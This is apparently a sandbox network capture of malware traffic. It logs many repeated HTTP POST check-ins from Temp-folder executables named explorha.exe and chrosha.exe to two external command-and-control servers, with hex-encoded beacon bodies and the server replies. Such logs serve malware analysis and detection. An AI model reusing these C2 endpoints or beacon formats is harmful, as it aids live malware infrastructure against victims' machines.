Apr 19, 2024 03:32:29.923275948 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:30.168143034 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
548 | 192.168.2.5 | 50393 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:29.956307888 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:30.201739073 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
549 | 192.168.2.5 | 50394 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:30.527277946 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:32:30.773710966 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:32:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      550 | 192.168.2.5 | 50395 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:30.549860001 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:30.791482925 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      551 | 192.168.2.5 | 50396 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.022213936 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.268595934 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      552 | 192.168.2.5 | 50397 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.045983076 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.298574924 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      553 | 192.168.2.5 | 50398 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.638062000 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.890132904 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      554 | 192.168.2.5 | 50399 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.661407948 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:31.904953957 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      555 | 192.168.2.5 | 50400 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:32.141104937 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:32.392848969 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
556 | 192.168.2.5 | 50401 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:32.152057886 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:32.398381948 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
557 | 192.168.2.5 | 50402 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:32.757859945 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:33.002264023 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
558 | 192.168.2.5 | 50403 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:32.763286114 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:33.011971951 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
559 | 192.168.2.5 | 50404 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:33.254697084 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:33.506635904 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
560 | 192.168.2.5 | 50405 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:33.264170885 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:33.516966105 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
561 | 192.168.2.5 | 50406 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:33.869157076 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:34.118304968 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      562 | 192.168.2.5 | 50407 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:33.881031990 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:34.125248909 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      563 | 192.168.2.5 | 50408 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:34.369216919 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:34.619044065 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      564 | 192.168.2.5 | 50409 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:34.375514984 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:34.626148939 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
